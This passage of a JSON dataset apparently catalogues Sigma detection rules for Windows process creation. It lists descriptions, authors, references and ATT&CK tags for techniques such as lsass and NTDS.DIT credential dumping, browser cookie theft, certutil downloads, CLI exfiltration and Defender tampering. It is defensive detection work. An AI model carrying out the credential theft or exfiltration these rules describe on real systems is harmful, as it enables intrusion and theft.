"meta": { "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate administration activity to troubleshoot network issues" ], "filename": "proc_creation_win_susp_network_sniffing.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_sniffing.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "value": "Potential Network Sniffing Activity Using Network Tools" }, { "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-18", "falsepositive": [ "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "filename": "proc_creation_win_wpbbin_potential_persistence.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/wpbbin.html", "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1542.001" ] }, "related": [ { "dest-uuid": "16ab6452-c3c1-497c-a47d-206018ca1ada", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", "value": "UEFI Persistence Via Wpbbin - ProcessCreation" }, { "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", "meta": { "author": "John Lambert (rule)", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_hidden_flag.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_hidden_flag.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" }, { "description": "Detects user accept agreement execution in psexec commandline", "meta": { "author": "omkar72", "creation_date": "2020-10-30", "falsepositive": [ "Administrative scripts." ], "filename": "proc_creation_win_sysinternals_psexec_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_execution.yml" ], "tags": [ "attack.execution", "attack.t1569", "attack.t1021" ] }, "related": [ { "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", "value": "Psexec Execution" }, { "description": "Detects the enumeration and query of interesting and in some cases sensitive services on the system via \"sc.exe\".\nAttackers often try to enumerate the services currently running on a system in order to find different attack vectors.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-02-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_query_interesting_services.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/tag/svchost/", "https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml" ], "tags": [ "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e83e8899-c9b2-483b-b355-5decc942b959", "value": "Interesting Service Enumeration Via Sc.EXE" }, { "description": "Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension", "meta": { "author": "Aedan Russell, frack113, X__Junior (Nextron Systems)", "creation_date": "2022-06-19", "falsepositive": [ "Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert" ], "filename": "proc_creation_win_browsers_chromium_load_extension.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://emkc.org/s/RJjuLa", "https://redcanary.com/blog/chromeloader/", "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml" ], "tags": [ "attack.persistence", "attack.t1176" ] }, "related": [ { "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88d6e60c-759d-4ac1-a447-c0f1466c2d21", "value": "Chromium Browser Instance Executed With Custom Extension" }, { "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml" ], "tags": [ "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" }, { "description": "Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\nThreat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.\n", "meta": { "author": "@Kostastsale", "creation_date": "2023-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_office_disable_python_security_warnings.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_office_disable_python_security_warnings.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "023c654f-8f16-44d9-bb2b-00ff36a62af9", "value": "Python Function Execution Security Warning Disabled In Excel" }, { "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-08", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pua_nps.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/ehang-io/nps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nps.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", "value": "PUA - NPS Tunneling Tool Execution" }, { "description": "Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.\nThis can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bash_file_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://lolbas-project.github.io/lolbas/Binaries/Bash/", "https://linux.die.net/man/1/bash", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_file_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d22a514-e024-4428-9dba-41505bd63a5b", "value": "Indirect Command Execution From Script File Via Bash.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-20", "falsepositive": [ "Legitimate use of AnyDesk from a non-standard folder" ], "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "value": "Remote Access Tool - Anydesk Execution From Suspicious Folder" }, { "description": "Detects suspicious processes including shells spawnd from WinRM host process", "meta": { "author": "Andreas Hunkeler (@Karneades), Markus Neis", "creation_date": "2021-05-20", "falsepositive": [ "Legitimate WinRM usage" ], "filename": "proc_creation_win_winrm_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_susp_child_process.yml" ], "tags": [ "attack.t1190", "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "value": "Suspicious Processes Spawned by WinRM" }, { "description": "Detects the usage of \"reg.exe\" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection", "meta": { "author": "Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-03-22", "falsepositive": [ "Rare legitimate use by administrators to test software (should always be investigated)" ], "filename": "proc_creation_win_reg_windows_defender_tamper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2", "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", "value": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE" }, { "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_zip_compress.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml" ], "tags": [ "attack.collection", "attack.t1074.001" ] }, "related": [ { "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", "value": "Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet" }, { "description": "Detects the use of various CLI utilities exfiltrating data via web requests", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "value": "Potential Data Exfiltration Activity Via CommandLine Tools" }, { "description": "Detects the execution of \"dctask64.exe\", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\nThis binary can be abused for DLL injection, arbitrary command and process execution.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-01-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055.001" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6345b048-8441-43a7-9bed-541133633d7a", "value": "ManageEngine Endpoint Central Dctask64.EXE Potential Abuse" }, { "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", "value": "Remote Access Tool - RURAT Execution From Unusual Location" }, { "description": "Detects the execution of FSharp Interpreters \"FsiAnyCpu.exe\" and \"FSi.exe\"\nBoth can be used for AWL bypass and to execute F# code via scripts or inline.\n", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-02", "falsepositive": [ "Legitimate use by a software developer." ], "filename": "proc_creation_win_fsi_fsharp_code_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsi_fsharp_code_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", "value": "Use of FSharp Interpreters" }, { "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", "meta": { "author": "TropChaud", "creation_date": "2022-12-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sqlite_chromium_profile_data.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/", "https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml" ], "tags": [ "attack.credential-access", "attack.t1539", "attack.t1555.003", "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24c77512-782b-448a-8950-eddb0785fc71", "value": "SQLite Chromium Profile Data DB Access" }, { "description": "Detects execution of \"aspnet_compiler.exe\" with potentially suspicious paths for compilation.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_aspnet_compiler_susp_paths.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f50fe98-fe5c-4a2d-86c7-fad7f63ed622", "value": "Potentially Suspicious ASP.NET Compilation Via AspNetCompiler" }, { "description": "Detects suspicious use of XORDump process memory dumping utility", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-28", "falsepositive": [ "Another tool that uses the command line switches of XORdump" ], "filename": "proc_creation_win_hktl_xordump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/audibleblink/xordump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_xordump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "value": "HackTool - XORDump Execution" }, { "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2023-03-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/", "https://twitter.com/aceresponder/status/1636116096506818562", "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/", "https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/", "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003", "cve.2023-23397" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "value": "Suspicious WebDav Client Execution Via Rundll32.EXE" }, { "description": "Detects indicators of a UAC bypass method by mocking directories", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_trustedpath.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", "https://github.com/netero1010/TrustedPath-UACBypass-BOF", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml" ], "tags": [ "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "value": "TrustedPath UAC Bypass Pattern" }, { "description": "Detects the execution of a renamed \"Msdt.exe\" binary", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-06-03", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_renamed_msdt.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", "value": "Renamed Msdt.EXE Execution" }, { "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.youtube.com/watch?v=Ie831jF0bb0", "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011", "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "value": "Process Access via TrolleyExpress Exclusion" }, { "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_product.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2023/03/06/2022-year-in-review/", "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product", "https://www.yeahhub.com/list-installed-programs-version-path-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15434e33-5027-4914-88d5-3d4145ec25a9", "value": "Potential Product Reconnaissance Via Wmic.EXE" }, { "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/egre55/status/1087685529016193025", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "value": "Suspicious Download Via Certutil.EXE" }, { "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_change.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_change.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", "value": "Suspicious Modification Of Scheduled Tasks" }, { "description": "Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\nAttackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-05-10", "falsepositive": [ "Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis." ], "filename": "proc_creation_win_wbadmin_dump_sensitive_files.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup", "https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/", 